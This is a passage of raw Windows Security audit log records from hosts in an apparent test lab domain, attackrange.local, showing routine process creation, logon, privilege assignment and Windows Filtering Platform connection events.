Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887137
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 52857
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887136
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
Process ID: 0x12e0
Process Name: C:\Windows\System32\rdpclip.exe
Exit Status: 0x0
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887135
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x8DB827
Logon Type: 10
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887134
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\NETWORK SERVICE
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E4
Target Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
New Process ID: 0x12e0
New Process Name: C:\Windows\System32\rdpclip.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x130
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: rdpclip
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887133
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x924
New Process Name: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x34c
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887132
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x187c
New Process Name: C:\Windows\servicing\TrustedInstaller.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x268
Creator Process Name: C:\Windows\System32\services.exe
Process Command Line: C:\Windows\servicing\TrustedInstaller.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887131
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Privileges: SeAssignPrimaryTokenPrivilege
SeTcbPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887130
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x268
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887207
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 63912
Destination Address: 127.0.0.1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887206
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 127.0.0.1
Source Port: 63912
Destination Address: 127.0.0.1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887205
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53797
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887204
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 63912
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887203
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 63912
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887202
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 63912
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887201
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 63912
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887200
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.14
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887199
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887198
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887197
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1265
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887196
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1265
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887216
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x11bc
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Exit Status: 0x1
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887215
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887214
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887213
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1266
Destination Address: 40.70.224.147
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887212
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1266
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887211
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887210
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.14
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887209
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887208
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278833
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278832
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E4
Process Information:
New Process ID: 0x1db8
New Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x2d4
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278831
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Process Information:
New Process ID: 0x185c
New Process Name: C:\Windows\System32\dwm.exe
Token Elevation Type: %%1938
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe78
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: "dwm.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278830
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Privileges: SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278829
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD6480
Privileges: SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeImpersonatePrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278828
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Virtual Account: Yes
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Linked Logon ID: 0xBD6480
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0xe78
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278827
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Virtual Account: Yes
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD6480
Linked Logon ID: 0xBD64BF
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0xe78
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
